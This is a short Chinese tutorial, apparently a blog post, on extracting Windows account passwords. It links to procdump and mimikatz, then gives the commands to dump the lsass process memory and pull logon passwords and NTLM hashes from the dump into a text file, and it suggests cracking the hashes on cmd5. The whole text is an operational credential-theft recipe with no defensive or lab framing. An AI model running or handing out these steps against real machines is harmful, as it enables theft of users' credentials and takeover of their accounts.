procdump和mimikatz工具配合破解windows账户口令

1、先下载两个工具

procdump是微软官方Sysinternals工具合集中的（https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump）

mimikatz开源项目地址（https://github.com/gentilkiwi/mimikatz）文件地址（https://github.com/gentilkiwi/mimikatz/releases）

  

 2、用管理员权限打开cmd，进入procdump命令目录下执行下面命令会保存lsass进程数据到当前下的lsass.dmp文件

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

 

 

3、同样管理员权限进行mimikatz命令目录下执行下面命令会将记录输出到当前下的password.txt文件

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit>>password.txt

 

 4、NTLM后的密文拿到cmd5上就可以破解

 

参考：

两步完成利用procdump64+mimikatz获取win用户密码 - 夏天公子 - 博客园 

mimikatz提取windows密码 - 书生_L - 博客园 

•